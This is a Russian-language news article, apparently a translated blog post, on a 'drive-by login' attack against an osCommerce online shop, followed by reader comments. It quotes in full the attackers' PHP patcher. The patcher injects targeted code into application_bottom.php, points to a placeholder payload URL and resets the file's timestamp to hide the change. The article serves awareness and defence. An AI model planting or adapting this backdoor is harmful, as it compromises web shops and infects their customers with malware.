Специалистам по информационной безопасности хорошо известны атаки типа “drive-by download”. Под этим термином подразумевают, что скачивание зловреда произошло без ведома пользователя, как только он открыл определённую веб-страницу в браузере.
Сейчас появилась новая разновидность этой техники, которую по аналогии назвали “drive-by login”.
О таком виде атаки рассказывается в блоге компании High-Tech Bridge. Она столкнулась с ним при обслуживании одного из своих клиентов — среднего размера интернет-магазина из Центральной Европы.
Один из покупателей магазина пожаловался, что сайт пытается заразить его компьютер вредоносной программой. В то же время рутинное сканирование с проверкой на зловреды и уязвимости не выявило ничего подозрительного. Магазин работал на последней версии osCommerce Online Merchant v2.3.4, выпущенной в июне 2014 года.
Сначала специалисты подумали, что здесь ложная тревога, но потом выяснилось, что всё гораздо серьёзнее. На сервере нашли интересный файл под названием ozcommerz_pwner.php.bak, вот его содержимое.
<?php
# osCommerce 2.x.x universal user pwner by Piht0z
# tested on osCommerce-2.3.4
# keep priv8 && fuck white hats
$victim_ip = "127.0.0.1";
$victim_email = "user@mail.com";
$pack="http://host/bl.js";
$time = filectime("includes/application_bottom.php");
if(isset($_GET['del'])) {
$str = file_get_contents("includes/application_bottom.php");
$str = preg_replace('/\<\?\s.*/ms','',$str);
file_put_contents("includes/application_bottom.php",$str);
} else {
file_put_contents("includes/application_bottom.php", '<?
$str = "";
$ip = explode(".",$_SERVER["REMOTE_ADDR"]);
if($ip[0].".".$ip[1].".".$ip[2].".".$ip[3] == "'.$victim_ip.'")
{ echo $str; }
if ( is_int($_SESSION["customer_id"]) &&
($_SESSION["customer_id"] > 0) ) {
$customer_info_query = tep_db_query("select customers_email_address from "
. TABLE_CUSTOMERS . " where customers_id = \'" .
(int)$_SESSION["customer_id"] . "\'");
$customer_info = tep_db_fetch_array($customer_info_query);
if($customer_info["customers_email_address"] == "'.$victim_email.'") {
echo $str;
}
}
?>', FILE_APPEND);
}
touch("includes/application_bottom.php",$time);
?>Неизвестные хакеры любезно оставили комментарии в коде, так что несложно разобраться в работе универсального бэкдора для osCommerce.
Бэкдор внедряет вредоносный код в скрипт /includes/application_bottom.php, чтобы загружать зловред с удалённого сервера, в зависимости от IP-адреса пользователя или его адреса электронной почты, для зарегистрированных пользователей. Таким образом, скачивание зловреда осуществлялось после авторизации в магазине.
На данный момент бэкдор не определяется ни одним антивирусом.
Специалисты считают, что атаки типа “drive-by login” могут получить широкое распространение в будущем: они очень эффективны и их трудно обнаружить.
08.04.2015 at 14:53
или я тупой или вы недоговариваете, только понял что ссыль на зловред генерит пхп, а сам зловред в каком формате?
08.04.2015 at 14:58
Или перевод уныл или автор не шарит о чем пишет. Кусок кода — это патчер, модифицирующий application_bottom.php, чтобы можно было атаковать конкретного пользователя, а вот самый интересный вопрос, как этот патчер туда доставили и как исполнили — не освещен.
09.04.2015 at 10:12
Вот именно, описан один из возможных результатов предыдущего взлома сервера. А может и не взлома, а намеренного вредительства.
09.04.2015 at 13:39
Оно атакует не конкретного пользователя, а залогиненного пользователя. Сканеры безопасности при сканировании сайта же не логинятся в систему и соответственно эту каку не заметят, а пользователь как войдет на сайт, так сразу получит себе вирусняка.
09.04.2015 at 14:56
а что он если только куки украдёт буди, да закажет что нибудь за вас)
09.04.2015 at 15:27
и мне какая-то ненужная хрень придет по почте, он неизвестного кулхацкера? =)
09.04.2015 at 19:10
а нах ты это письмо будешь открывать?
09.04.2015 at 22:05
А мне наоборот, кажется, что он атакует конкретного пользователя в ходе таргетированной атаки.
11.04.2015 at 14:56
Сканер не должен никуда ломиться вообще. Он должен сравнивать текущее содержимое файлов сайта с содержимым из последнего релиза и говорить что отличается.
А ещё лучше — тупо перезалить на сервер всё, кроме баз данных, из последнего релиза и большинство внедрённых вирусов самоудалится или выйдет из строя…
26.04.2015 at 17:09
это не сканер тогда уже а Хост-IDS.
а мне не понятно, расширение .bac оно в пхп автоматически подцепляется куда-то? Это же backup, нет?